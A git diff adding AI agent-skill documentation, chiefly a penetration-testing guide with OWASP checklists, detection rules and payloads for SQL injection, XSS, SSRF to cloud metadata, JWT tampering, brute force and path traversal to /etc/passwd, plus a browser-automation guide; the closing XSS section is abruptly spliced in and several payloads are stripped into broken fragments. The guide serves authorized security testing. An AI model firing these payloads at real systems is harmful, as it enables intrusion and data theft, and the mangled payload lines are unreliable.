@@ -29,6 +29,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud Design scalable, cost-effective AWS architectures for startups with infrastructure-as-code templates. +- **[Azure Cloud Architect](azure-cloud-architect.md)** + + --- + + Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code te... + - **[Code Reviewer](code-reviewer.md)** --- @@ -53,6 +59,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud You are now a world-class epic design expert. You build cinematic, immersive websites that feel premium and alive — u... +- **[GCP Cloud Architect](gcp-cloud-architect.md)** + + --- + + Design scalable, cost-effective Google Cloud architectures for startups and enterprises with infrastructure-as-code t... + - **[Google Workspace CLI](google-workspace-cli.md)** --- @@ -77,6 +89,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud Production-grade Playwright testing toolkit for AI coding agents. +- **[Security Penetration Testing](security-pen-testing.md)** + + --- + + Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance che... + - **[Self-Improving Agent](self-improving-agent.md)** + 5 sub-skills --- diff --git a/docs/skills/engineering-team/security-pen-testing.md b/docs/skills/engineering-team/security-pen-testing.md new file mode 100644 index 0000000..aa0c158 --- /dev/null +++ b/docs/skills/engineering-team/security-pen-testing.md @@ -0,0 +1,861 @@ +--- +title: "Security Penetration Testing — Agent Skill & Codex Plugin" +description: "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw." +--- + +# Security Penetration Testing + +
+:material-code-braces: Engineering - Core +:material-identifier: `security-pen-testing` +:material-github: Source +
+ +
+Install: claude /plugin install engineering-skills +
+ + +Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance checking (see senior-secops) or security policy writing (see senior-security) — this is about systematic vulnerability discovery through authorized testing. + +--- + +## Table of Contents + +- [Overview](#overview) +- [OWASP Top 10 Systematic Audit](#owasp-top-10-systematic-audit) +- [Static Analysis](#static-analysis) +- [Dependency Vulnerability Scanning](#dependency-vulnerability-scanning) +- [Secret Scanning](#secret-scanning) +- [API Security Testing](#api-security-testing) +- [Web Vulnerability Testing](#web-vulnerability-testing) +- [Infrastructure Security](#infrastructure-security) +- [Pen Test Report Generation](#pen-test-report-generation) +- [Responsible Disclosure Workflow](#responsible-disclosure-workflow) +- [Workflows](#workflows) +- [Anti-Patterns](#anti-patterns) +- [Cross-References](#cross-references) + +--- + +## Overview + +### What This Skill Does + +This skill provides the methodology, checklists, and automation for **offensive security testing** — actively probing systems to discover exploitable vulnerabilities. It covers web applications, APIs, infrastructure, and supply chain security. + +### Distinction from Other Security Skills + +| Skill | Focus | Approach | +|-------|-------|----------| +| **security-pen-testing** (this) | Finding vulnerabilities | Offensive — simulate attacker techniques | +| senior-secops | Security operations | Defensive — monitoring, incident response, SIEM | +| senior-security | Security policy | Governance — policies, frameworks, risk registers | +| skill-security-auditor | CI/CD gates | Automated — pre-merge security checks | + +### Prerequisites + +All testing described here assumes **written authorization** from the system owner. Unauthorized testing is illegal under the CFAA and equivalent laws worldwide. Always obtain a signed scope-of-work or rules-of-engagement document before starting. 
+ +--- + +## OWASP Top 10 Systematic Audit + +Use the vulnerability scanner tool for automated checklist generation: + +```bash +# Generate OWASP checklist for a web application +python scripts/vulnerability_scanner.py --target web --scope full + +# Quick API-focused scan +python scripts/vulnerability_scanner.py --target api --scope quick --json +``` + +### A01:2021 — Broken Access Control + +**Test Procedures:** +1. Attempt horizontal privilege escalation: access another user's resources by changing IDs +2. Test vertical escalation: access admin endpoints with regular user tokens +3. Verify CORS configuration — check `Access-Control-Allow-Origin` for wildcards +4. Test forced browsing to admin pages (`/admin`, `/api/admin`, `/debug`) +5. Modify JWT claims (`role`, `is_admin`) and replay tokens + +**What to Look For:** +- Missing authorization checks on API endpoints +- Predictable resource IDs (sequential integers vs. UUIDs) +- Client-side only access controls (hidden UI elements without server checks) +- CORS misconfigurations allowing arbitrary origins + +### A02:2021 — Cryptographic Failures + +**Test Procedures:** +1. Check TLS version — reject anything below TLS 1.2 +2. Verify password hashing: bcrypt/scrypt/argon2 with adequate cost factor +3. Look for sensitive data in URLs (tokens in query params get logged) +4. Check for hardcoded encryption keys in source code +5. Test for weak random number generation (Math.random() for tokens) + +**What to Look For:** +- MD5/SHA1 used for password hashing +- Secrets in environment variables without encryption at rest +- Missing `Strict-Transport-Security` header +- Self-signed certificates in production + +### A03:2021 — Injection + +**Test Procedures:** +1. SQL injection: test all input fields with `' OR 1=1--` and time-based payloads +2. NoSQL injection: test with `{"$gt": ""}` and `{"$ne": null}` in JSON bodies +3. Command injection: test inputs with `; whoami` and backtick substitution +4. 
LDAP injection: test with `*)(uid=*))(|(uid=*` +5. Template injection: test with `{{7*7}}` and `${7*7}` + +**What to Look For:** +- String concatenation in SQL queries +- User input passed to `eval()`, `exec()`, `os.system()` +- Unparameterized ORM queries +- Template engines rendering user input without sandboxing + +### A04:2021 — Insecure Design + +**Test Procedures:** +1. Review business logic flows for abuse scenarios (e.g., negative quantities in carts) +2. Check rate limiting on sensitive operations (login, password reset, OTP) +3. Test multi-step flows for state manipulation (skip payment step) +4. Verify security questions aren't guessable + +**What to Look For:** +- Missing rate limits on authentication endpoints +- Business logic that trusts client-side calculations +- Lack of account lockout after failed attempts +- Missing CAPTCHA on public-facing forms + +### A05:2021 — Security Misconfiguration + +**Test Procedures:** +1. Check for default credentials on admin panels +2. Verify unnecessary HTTP methods are disabled (TRACE, DELETE on public endpoints) +3. Check error handling — stack traces should never leak to users +4. Review HTTP security headers (CSP, X-Frame-Options, X-Content-Type-Options) +5. Check directory listing is disabled + +**What to Look For:** +- Debug mode enabled in production +- Default admin:admin credentials +- Verbose error messages with stack traces +- Missing security headers + +### A06:2021 — Vulnerable and Outdated Components + +**Test Procedures:** +1. Run dependency audit against known CVE databases +2. Check for end-of-life frameworks and libraries +3. Verify transitive dependency versions +4. 
Check for known vulnerable versions (e.g., Log4j 2.0-2.14.1) + +```bash +# Audit a package manifest +python scripts/dependency_auditor.py --file package.json --severity high +python scripts/dependency_auditor.py --file requirements.txt --json +``` + +### A07:2021 — Identification and Authentication Failures + +**Test Procedures:** +1. Test brute force protection on login endpoints +2. Check password policy enforcement (minimum length, complexity) +3. Verify session invalidation on logout and password change +4. Test "remember me" token security (HttpOnly, Secure, SameSite flags) +5. Check multi-factor authentication bypass paths + +**What to Look For:** +- Sessions that persist after logout +- Missing `HttpOnly` and `Secure` flags on session cookies +- Password reset tokens that don't expire +- Username enumeration via different error messages + +### A08:2021 — Software and Data Integrity Failures + +**Test Procedures:** +1. Check for unsigned updates or deployment artifacts +2. Verify CI/CD pipeline integrity (signed commits, protected branches) +3. Test deserialization endpoints with crafted payloads +4. Check for SRI (Subresource Integrity) on CDN-loaded scripts + +**What to Look For:** +- Unsafe deserialization of user input (pickle, Java serialization) +- Missing integrity checks on downloaded artifacts +- CI/CD pipelines running untrusted code +- CDN scripts without SRI hashes + +### A09:2021 — Security Logging and Monitoring Failures + +**Test Procedures:** +1. Verify authentication events are logged (success and failure) +2. Check that logs don't contain sensitive data (passwords, tokens, PII) +3. Test alerting thresholds (do 50 failed logins trigger an alert?) +4. Verify log integrity — can an attacker tamper with logs? 
+ +**What to Look For:** +- Missing audit trail for admin actions +- Passwords or tokens appearing in logs +- No alerting on suspicious patterns +- Logs stored without integrity protection + +### A10:2021 — Server-Side Request Forgery (SSRF) + +**Test Procedures:** +1. Test URL input fields with internal addresses (`http://169.254.169.254/` for cloud metadata) +2. Check for open redirect chains that reach internal services +3. Test with DNS rebinding payloads +4. Verify allowlist validation on outbound requests + +**What to Look For:** +- User-controlled URLs passed to `fetch()`, `requests.get()`, `curl` +- Missing allowlist on outbound HTTP requests +- Ability to reach cloud metadata endpoints (AWS, GCP, Azure) +- PDF generators or screenshot services that fetch arbitrary URLs + +--- + +## Static Analysis + +### CodeQL Custom Rules + +Write custom CodeQL queries for project-specific vulnerability patterns: + +```ql +/** + * Detect SQL injection via string concatenation + */ +import python +import semmle.python.dataflow.new.DataFlow + +from Call call, StringFormatting fmt +where + call.getFunc().getName() = "execute" and + fmt = call.getArg(0) and + exists(DataFlow::Node source | + source.asExpr() instanceof Name and + DataFlow::localFlow(source, DataFlow::exprNode(fmt.getAnOperand())) + ) +select call, "Potential SQL injection: user input flows into execute()" +``` + +### Semgrep Custom Rules + +Create project-specific Semgrep rules: + +```yaml +rules: + - id: hardcoded-jwt-secret + pattern: | + jwt.encode($PAYLOAD, "...", ...) + message: "JWT signed with hardcoded secret" + severity: ERROR + languages: [python] + + - id: unsafe-yaml-load + pattern: yaml.load($DATA) + fix: yaml.safe_load($DATA) + message: "Use yaml.safe_load() to prevent arbitrary code execution" + severity: WARNING + languages: [python] + + - id: express-no-helmet + pattern: | + const app = express(); + ... + app.listen(...) + pattern-not: | + const app = express(); + ... 
+ app.use(helmet(...)); + ... + app.listen(...) + message: "Express app missing helmet middleware for security headers" + severity: WARNING + languages: [javascript, typescript] +``` + +### ESLint Security Plugins + +Recommended configuration: + +```json +{ + "plugins": ["security", "no-unsanitized"], + "extends": ["plugin:security/recommended"], + "rules": { + "security/detect-object-injection": "error", + "security/detect-non-literal-regexp": "warn", + "security/detect-unsafe-regex": "error", + "security/detect-buffer-noassert": "error", + "security/detect-eval-with-expression": "error", + "no-unsanitized/method": "error", + "no-unsanitized/property": "error" + } +} +``` + +--- + +## Dependency Vulnerability Scanning + +### Ecosystem-Specific Commands + +```bash +# Node.js +npm audit --json | jq '.vulnerabilities | to_entries[] | select(.value.severity == "critical")' + +# Python +pip-audit --format json --desc +safety check --json + +# Go +govulncheck ./... + +# Ruby +bundle audit check --update +``` + +### CVE Triage Workflow + +1. **Collect**: Run ecosystem audit tools, aggregate findings +2. **Deduplicate**: Group by CVE ID across direct and transitive deps +3. **Score**: Use CVSS base score + environmental adjustments +4. **Prioritize**: Critical + exploitable + reachable = fix immediately +5. **Remediate**: Upgrade, patch, or mitigate with compensating controls +6. 
**Verify**: Rerun audit to confirm fix, update lock files + +```bash +# Use the dependency auditor for automated triage +python scripts/dependency_auditor.py --file package.json --severity critical --json +``` + +### Known Vulnerable Patterns + +| Package | Vulnerable Versions | CVE | Impact | +|---------|-------------------|-----|--------| +| log4j-core | 2.0 - 2.14.1 | CVE-2021-44228 | RCE via JNDI injection | +| lodash | < 4.17.21 | CVE-2021-23337 | Command injection via `_.template` | +| axios | < 1.6.0 | CVE-2023-45857 | CSRF token exposure | +| pillow | < 9.3.0 | CVE-2022-45198 | DoS via crafted image | +| express | < 4.19.2 | CVE-2024-29041 | Open redirect | + +--- + +## Secret Scanning + +### TruffleHog Patterns + +```bash +# Scan git history for secrets +trufflehog git file://. --only-verified --json + +# Scan filesystem (no git history) +trufflehog filesystem . --json +``` + +### Gitleaks Configuration + +```toml +# .gitleaks.toml +title = "Custom Gitleaks Config" + +[[rules]] +id = "aws-access-key" +description = "AWS Access Key ID" +regex = '''AKIA[0-9A-Z]{16}''' +tags = ["aws", "credentials"] + +[[rules]] +id = "generic-api-key" +description = "Generic API Key" +regex = '''(?i)(api[_-]?key|apikey)\s*[:=]\s*['\"][a-zA-Z0-9]{20,}['\"]''' +tags = ["api", "key"] + +[[rules]] +id = "private-key" +description = "Private Key Header" +regex = '''-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----''' +tags = ["private-key"] + +[allowlist] +paths = ['''\.test\.''', '''_test\.go''', '''mock''', '''fixture'''] +``` + +### Pre-commit Hook Integration + +```yaml +# .pre-commit-config.yaml +repos: + - repo: https://github.com/gitleaks/gitleaks + rev: v8.18.0 + hooks: + - id: gitleaks + + - repo: https://github.com/trufflesecurity/trufflehog + rev: v3.63.0 + hooks: + - id: trufflehog + args: ["git", "file://.", "--since-commit", "HEAD", "--only-verified"] +``` + +### CI Integration (GitHub Actions) + +```yaml +name: Secret Scan +on: [push, pull_request] +jobs: + scan: + runs-on: 
ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + - uses: trufflesecurity/trufflehog@main + with: + extra_args: --only-verified +``` + +--- + +## API Security Testing + +### Authentication Bypass + +**JWT Manipulation:** +1. Decode token at jwt.io — inspect claims without verification +2. Change `alg` to `none` and remove signature: `eyJ...payload.` +3. Change `alg` from RS256 to HS256 and sign with the public key +4. Modify claims (`role: "admin"`, `exp: 9999999999`) and re-sign with weak secrets +5. Test key confusion: HMAC signed with RSA public key bytes + +**Session Fixation:** +1. Obtain a session token before authentication +2. Authenticate — check if the session ID changes +3. If the same session ID persists, the app is vulnerable to session fixation + +### Authorization Flaws + +**IDOR (Insecure Direct Object Reference):** +``` +GET /api/users/123/profile → 200 (your profile) +GET /api/users/124/profile → 200 (someone else's profile — IDOR!) +GET /api/users/124/profile → 403 (properly protected) +``` + +Test pattern: Change numeric IDs, UUIDs, slugs in every endpoint. Use Burp Intruder or a simple script to iterate. + +**BOLA (Broken Object Level Authorization):** +Same as IDOR but specifically in REST APIs. Test every CRUD operation: +- Can user A read user B's resource? +- Can user A update user B's resource? +- Can user A delete user B's resource? 
+**BFLA (Broken Function Level Authorization):** +``` +# Regular user tries admin endpoints +POST /api/admin/users → Should be 403 +DELETE /api/admin/users/123 → Should be 403 +PUT /api/settings/global → Should be 403 +``` + +### Rate Limiting Validation + +Test rate limits on critical endpoints: +```bash +# Rapid-fire login attempts +for i in $(seq 1 100); do + curl -s -o /dev/null -w "%{http_code}" \ + -X POST https://target.com/api/login \ + -d '{"email":"test@test.com","password":"wrong"}'; +done +# Expect: 429 after threshold (typically 5-10 attempts) +``` + +### Mass Assignment Detection + +```bash +# Try adding admin fields to a regular update request +PUT /api/users/profile +{ + "name": "Normal User", + "email": "user@test.com", + "role": "admin", # mass assignment attempt + "is_verified": true, # mass assignment attempt + "subscription": "enterprise" # mass assignment attempt +} +``` + +### GraphQL-Specific Testing + +**Introspection Query:** +```graphql +{ + __schema { + types { name fields { name type { name } } } + } +} +``` +Introspection should be **disabled in production**. + +**Query Depth Attack:** +```graphql +{ + user(id: 1) { + friends { + friends { + friends { + friends { # Keep nesting until server crashes + name + } + } + } + } + } +} +``` + +**Batching Attack:** +```json +[ + {"query": "mutation { login(user:\"admin\", pass:\"password1\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"password2\") { token } }"}, + {"query": "mutation { login(user:\"admin\", pass:\"password3\") { token } }"} +] +``` +Batch mutations can bypass rate limiting if counted as a single request. + +--- + +## Web Vulnerability Testing + +### XSS (Cross-Site Scripting) + +**Reflected XSS Test Payloads** (non-destructive): +``` +<script>alert(document.domain)</script> +"><img src=x onerror=alert(document.domain)> +javascript:alert(document.domain) +<svg onload=alert(document.domain)> +'-alert(document.domain)-' +<details open ontoggle=alert(document.domain)> +``` + +**Stored XSS**: Submit payloads in persistent fields (comments, profiles, messages), then check if they render for other users. 
+ +**DOM-Based XSS**: Look for `innerHTML`, `document.write()`, `eval()` operating on `location.hash`, `location.search`, or `document.referrer`. + +### CSRF Token Validation + +1. Capture a legitimate request with CSRF token +2. Replay the request without the token — should fail (403) +3. Replay with a token from a different session — should fail +4. Check if token changes per request or is static per session +5. Verify `SameSite` cookie attribute is set to `Strict` or `Lax` + +### SQL Injection + +**Detection Payloads** (safe, non-destructive): +``` +' OR '1'='1 +' OR '1'='1' -- +" OR "1"="1 +1 OR 1=1 +' UNION SELECT NULL-- +' AND SLEEP(5)-- (time-based blind) +' AND 1=1-- (boolean-based blind) +``` + +**Union-Based Enumeration** (authorized testing only): +```sql +' UNION SELECT 1,2,3-- -- Find column count +' UNION SELECT table_name,2,3 FROM information_schema.tables-- +' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'-- +``` + +**Time-Based Blind:** +```sql +' AND IF(1=1, SLEEP(5), 0)-- -- MySQL +' AND pg_sleep(5)-- -- PostgreSQL +' WAITFOR DELAY '0:0:5'-- -- MSSQL +``` + +### SSRF Detection + +**Payloads for SSRF testing:** +``` +http://127.0.0.1 +http://localhost +http://169.254.169.254/latest/meta-data/ (AWS metadata) +http://metadata.google.internal/ (GCP metadata) +http://169.254.169.254/metadata/instance (Azure metadata) +http://[::1] (IPv6 localhost) +http://0x7f000001 (hex encoding) +http://2130706433 (decimal encoding) +``` + +### Path Traversal + +``` +GET /api/files?name=../../../etc/passwd +GET /api/files?name=....//....//....//etc/passwd +GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd +GET /api/files?name=..%252f..%252f..%252fetc%252fpasswd (double encoding) +``` + +--- + +## Infrastructure Security + +### Misconfigured Cloud Storage + +**S3 Bucket Checks:** +```bash +# Check for public read access +aws s3 ls s3://target-bucket --no-sign-request + +# Check bucket policy +aws s3api 
get-bucket-policy --bucket target-bucket + +# Check ACL +aws s3api get-bucket-acl --bucket target-bucket +``` + +**Common Bucket Name Patterns:** +``` +{company}-backup, {company}-dev, {company}-staging +{company}-assets, {company}-uploads, {company}-logs +``` + +### HTTP Security Headers + +Required headers and expected values: + +| Header | Expected Value | +|--------|---------------| +| `Strict-Transport-Security` | `max-age=31536000; includeSubDomains; preload` | +| `Content-Security-Policy` | Restrictive policy, no `unsafe-inline` or `unsafe-eval` | +| `X-Content-Type-Options` | `nosniff` | +| `X-Frame-Options` | `DENY` or `SAMEORIGIN` | +| `Referrer-Policy` | `strict-origin-when-cross-origin` | +| `Permissions-Policy` | Restrict camera, microphone, geolocation | +| `X-XSS-Protection` | `0` (deprecated, CSP is preferred) | + +### TLS Configuration + +```bash +# Check TLS version and cipher suites +nmap --script ssl-enum-ciphers -p 443 target.com + +# Quick check with testssl.sh +./testssl.sh target.com + +# Check certificate expiry +echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates +``` + +**Reject:** TLS 1.0, TLS 1.1, RC4, DES, 3DES, MD5 in cipher suites, CBC mode ciphers (BEAST), export-grade ciphers. 
+ +### Open Port Scanning + +```bash +# Quick top-1000 ports +nmap -sV target.com + +# Full port scan +nmap -p- -sV target.com + +# Common dangerous open ports +# 21 (FTP), 23 (Telnet), 445 (SMB), 3389 (RDP), 6379 (Redis), 27017 (MongoDB) +``` + +--- + +## Pen Test Report Generation + +Generate professional reports from structured findings: + +```bash +# Generate markdown report from findings JSON +python scripts/pentest_report_generator.py --findings findings.json --format md --output report.md + +# Generate JSON report +python scripts/pentest_report_generator.py --findings findings.json --format json --output report.json +``` + +### Findings JSON Format + +```json +[ + { + "title": "SQL Injection in Login Endpoint", + "severity": "critical", + "cvss_score": 9.8, + "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "category": "A03:2021 - Injection", + "description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.", + "evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token", + "impact": "Full database access, authentication bypass, potential remote code execution", + "remediation": "Use parameterized queries. Replace string concatenation with prepared statements.", + "references": ["https://cwe.mitre.org/data/definitions/89.html"] + } +] +``` + +### Report Structure + +1. **Executive Summary**: Business impact, overall risk level, top 3 findings +2. **Scope**: What was tested, what was excluded, testing dates +3. **Methodology**: Tools used, testing approach (black/gray/white box) +4. **Findings Table**: Sorted by severity with CVSS scores +5. **Detailed Findings**: Each with description, evidence, impact, remediation +6. **Remediation Priority Matrix**: Effort vs. impact for each fix +7. 
**Appendix**: Raw tool output, full payload lists + +--- + +## Responsible Disclosure Workflow + +Responsible disclosure is **mandatory** for any vulnerability found during authorized testing or independent research. See `references/responsible_disclosure.md` for full templates. + +### Timeline + +| Day | Action | +|-----|--------| +| 0 | Discovery — document finding with evidence | +| 1 | Report to vendor via security contact or bug bounty program | +| 7 | Follow up if no acknowledgment received | +| 30 | Request status update and remediation timeline | +| 60 | Second follow-up — offer technical assistance | +| 90 | Public disclosure (with or without fix, per industry standard) | + +### Key Principles + +1. **Never exploit beyond proof of concept** — demonstrate impact without causing damage +2. **Encrypt all communications** — PGP/GPG for email, secure channels for details +3. **Do not access, modify, or exfiltrate real user data** — use your own test accounts +4. **Document everything** — timestamps, screenshots, request/response pairs +5. **Respect the vendor's timeline** — extend deadline if they're actively working on a fix + +--- + +## Workflows + +### Workflow 1: Quick Security Check (15 Minutes) + +For pre-merge reviews or quick health checks: + +```bash +# 1. Generate OWASP checklist +python scripts/vulnerability_scanner.py --target web --scope quick + +# 2. Scan dependencies +python scripts/dependency_auditor.py --file package.json --severity high + +# 3. Check for secrets in recent commits +# (Use gitleaks or trufflehog as described in Secret Scanning section) + +# 4. Review HTTP security headers +curl -sI https://target.com | grep -iE "(strict-transport|content-security|x-frame|x-content-type)" +``` + +**Decision**: If any critical or high findings, block the merge. + +### Workflow 2: Full Penetration Test (Multi-Day Assessment) + +**Day 1 — Reconnaissance:** +1. Map the attack surface: endpoints, authentication flows, third-party integrations +2. 
Run automated OWASP checklist (full scope) +3. Run dependency audit across all manifests +4. Run secret scan on full git history + +**Day 2 — Manual Testing:** +1. Test authentication and authorization (IDOR, BOLA, BFLA) +2. Test injection points (SQLi, XSS, SSRF, command injection) +3. Test business logic flaws +4. Test API-specific vulnerabilities (GraphQL, rate limiting, mass assignment) + +**Day 3 — Infrastructure and Reporting:** +1. Check cloud storage permissions +2. Verify TLS configuration and security headers +3. Port scan for unnecessary services +4. Compile findings into structured JSON +5. Generate pen test report + +```bash +# Generate final report +python scripts/pentest_report_generator.py --findings findings.json --format md --output pentest-report.md +``` + +### Workflow 3: CI/CD Security Gate + +Automated security checks that run on every pull request: + +```yaml +# .github/workflows/security-gate.yml +name: Security Gate +on: [pull_request] +jobs: + security: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + # Secret scanning + - name: Scan for secrets + uses: trufflesecurity/trufflehog@main + with: + extra_args: --only-verified + + # Dependency audit + - name: Audit dependencies + run: | + npm audit --audit-level=high + pip-audit --desc + + # SAST + - name: Static analysis + uses: returntocorp/semgrep-action@v1 + with: + config: >- + p/security-audit + p/secrets + p/owasp-top-ten + + # Security headers check (staging only) + - name: Check security headers + if: github.base_ref == 'staging' + run: | + curl -sI $STAGING_URL | python scripts/vulnerability_scanner.py --target web --scope quick +``` + +**Gate Policy**: Block merge on critical/high findings. Warn on medium. Log low/info. + +--- + +## Anti-Patterns + +1. **Testing in production without authorization** — Always get written permission and use staging/test environments when possible +2. 
**Ignoring low-severity findings** — Low findings compound; a chain of lows can become a critical exploit path +3. **Skipping responsible disclosure** — Every vulnerability found must be reported through proper channels +4. **Relying solely on automated tools** — Tools miss business logic flaws, chained exploits, and novel attack vectors +5. **Testing without a defined scope** — Scope creep leads to legal liability; document what is and isn't in scope +6. **Reporting without remediation guidance** — Every finding must include actionable remediation steps +7. **Storing evidence insecurely** — Pen test evidence (screenshots, payloads, tokens) is sensitive; encrypt and restrict access +8. **One-time testing** — Security testing must be continuous; integrate into CI/CD and schedule periodic assessments + +--- + +## Cross-References + +| Skill | Relationship | +|-------|-------------| +| [senior-secops](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-secops/SKILL.md) | Defensive security operations — monitoring, incident response, SIEM configuration | +| [senior-security](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-security/SKILL.md) | Security policy and governance — frameworks, risk registers, compliance | +| [dependency-auditor](https://github.com/alirezarezvani/claude-skills/tree/main/engineering/dependency-auditor/SKILL.md) | Deep supply chain security — SBOMs, license compliance, transitive risk | +| [code-reviewer](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/code-reviewer/SKILL.md) | Code review practices — includes security review checklist | diff --git a/docs/skills/engineering/browser-automation.md b/docs/skills/engineering/browser-automation.md new file mode 100644 index 0000000..1c15b08 --- /dev/null +++ b/docs/skills/engineering/browser-automation.md @@ -0,0 +1,575 @@ +--- +title: "Browser Automation — Agent Skill for Codex & OpenClaw" +description: "Use 
when the user asks to automate browser tasks, scrape websites, fill forms, capture screenshots, extract structured data from web pages, or build web automation workflows. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw." +--- + +# Browser Automation + +
+:material-rocket-launch: Engineering - POWERFUL +:material-identifier: `browser-automation` +:material-github: Source +
+ +
+Install: claude /plugin install engineering-advanced-skills +
+ + +## Overview + +The Browser Automation skill provides comprehensive tools and knowledge for building production-grade web automation workflows using Playwright. This skill covers data extraction, form filling, screenshot capture, session management, and anti-detection patterns for reliable browser automation at scale. + +**When to use this skill:** +- Scraping structured data from websites (tables, listings, search results) +- Automating multi-step browser workflows (login, fill forms, download files) +- Capturing screenshots or PDFs of web pages +- Extracting data from SPAs and JavaScript-heavy sites +- Building repeatable browser-based data pipelines + +**When NOT to use this skill:** +- Writing browser tests or E2E test suites — use **playwright-pro** instead +- Testing API endpoints — use **api-test-suite-builder** instead +- Load testing or performance benchmarking — use **performance-profiler** instead + +**Why Playwright over Selenium or Puppeteer:** +- **Auto-wait built in** — no explicit `sleep()` or `waitForElement()` needed for most actions +- **Multi-browser from one API** — Chromium, Firefox, WebKit with zero config changes +- **Network interception** — block ads, mock responses, capture API calls natively +- **Browser contexts** — isolated sessions without spinning up new browser instances +- **Codegen** — `playwright codegen` records your actions and generates scripts +- **Async-first** — Python async/await for high-throughput scraping + +## Core Competencies + +### 1. Web Scraping Patterns + +#### DOM Extraction with CSS Selectors +CSS selectors are the primary tool for element targeting. Prefer them over XPath for readability and performance. + +**Selector priority (most to least reliable):** +1. `data-testid`, `data-id`, or custom data attributes — stable across redesigns +2. `#id` selectors — unique but may change between deploys +3. Semantic selectors: `article`, `nav`, `main`, `section` — resilient to CSS changes +4. 
Class-based: `.product-card`, `.price` — brittle if classes are generated (e.g., CSS modules) +5. Positional: `nth-child()`, `nth-of-type()` — last resort, breaks on layout changes + +**Compound selectors for precision:** +```python +# Product cards within a specific container +page.query_selector_all("div.search-results > article.product-card") + +# Price inside a product card (scoped) +card.query_selector("span[data-field='price']") + +# Links with specific text content +page.locator("a", has_text="Next Page") +``` + +#### XPath for Complex Traversal +Use XPath only when CSS cannot express the relationship: +```python +# Find element by text content (XPath strength) +page.locator("//td[contains(text(), 'Total')]/following-sibling::td[1]") + +# Navigate up the DOM tree +page.locator("//span[@class='price']/ancestor::div[@class='product']") +``` + +#### Pagination Patterns +- **Next-button pagination**: Click "Next" until disabled or absent +- **URL-based pagination**: Increment `?page=N` or `&offset=N` in URL +- **Infinite scroll**: Scroll to bottom, wait for new content, repeat until no change +- **Load-more button**: Click button, wait for DOM mutation, repeat + +#### Infinite Scroll Handling +```python +async def scroll_to_bottom(page, max_scrolls=50, pause_ms=1500): + previous_height = 0 + for i in range(max_scrolls): + current_height = await page.evaluate("document.body.scrollHeight") + if current_height == previous_height: + break + await page.evaluate("window.scrollTo(0, document.body.scrollHeight)") + await page.wait_for_timeout(pause_ms) + previous_height = current_height + return i + 1 # number of scrolls performed +``` + +### 2. 
Form Filling & Multi-Step Workflows + +#### Login Flows +```python +async def login(page, url, username, password): + await page.goto(url) + await page.fill("input[name='username']", username) + await page.fill("input[name='password']", password) + await page.click("button[type='submit']") + # Wait for navigation to complete (post-login redirect) + await page.wait_for_url("**/dashboard**") +``` + +#### Multi-Page Forms +Break multi-step forms into discrete functions per step. Each function: +1. Fills the fields for that step +2. Clicks the "Next" or "Continue" button +3. Waits for the next step to load (URL change or DOM element) + +```python +async def fill_step_1(page, data): + await page.fill("#first-name", data["first_name"]) + await page.fill("#last-name", data["last_name"]) + await page.select_option("#country", data["country"]) + await page.click("button:has-text('Continue')") + await page.wait_for_selector("#step-2-form") + +async def fill_step_2(page, data): + await page.fill("#address", data["address"]) + await page.fill("#city", data["city"]) + await page.click("button:has-text('Continue')") + await page.wait_for_selector("#step-3-form") +``` + +#### File Uploads +```python +# Single file +await page.set_input_files("input[type='file']", "/path/to/file.pdf") + +# Multiple files +await page.set_input_files("input[type='file']", [ + "/path/to/file1.pdf", + "/path/to/file2.pdf" +]) + +# Drag-and-drop upload zones (no visible input element) +async with page.expect_file_chooser() as fc_info: + await page.click("div.upload-zone") +file_chooser = await fc_info.value +await file_chooser.set_files("/path/to/file.pdf") +``` + +#### Dropdown and Select Handling +```python +# Native + +
+``` + +**Filter bypass payloads:** +``` + +ipt>alert(document.domain)ipt> + + + +javascript:alert(document.domain)// +``` + +**URL encoding payloads:** +``` +%3Cscript%3Ealert(document.domain)%3C/script%3E +%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E +``` + +**Context-specific payloads:** + +Inside HTML attribute: +``` +" onmouseover="alert(document.domain) +' onfocus='alert(document.domain)' autofocus=' +``` + +Inside JavaScript string: +``` +';alert(document.domain);// +\';alert(document.domain);// + +``` + +Inside CSS: +``` +expression(alert(document.domain)) +url(javascript:alert(document.domain)) +``` + +### Stored XSS + +Test these in persistent fields: user profiles, comments, forum posts, file upload names, chat messages. + +``` + +click me + +``` + +### DOM-Based XSS + +Look for JavaScript that reads from these sources and writes to dangerous sinks: + +**Sources** (attacker-controlled input): +``` +document.location +document.location.hash +document.location.search +document.referrer +window.name +document.cookie +localStorage / sessionStorage +postMessage data +``` + +**Sinks** (dangerous output): +``` +element.innerHTML +element.outerHTML +document.write() +document.writeln() +eval() +setTimeout(string) +setInterval(string) +new Function(string) +element.setAttribute("onclick", ...) +location.href = ... +location.assign(...) +``` + +**Detection pattern:** Search for any code path where a Source flows into a Sink without sanitization. 
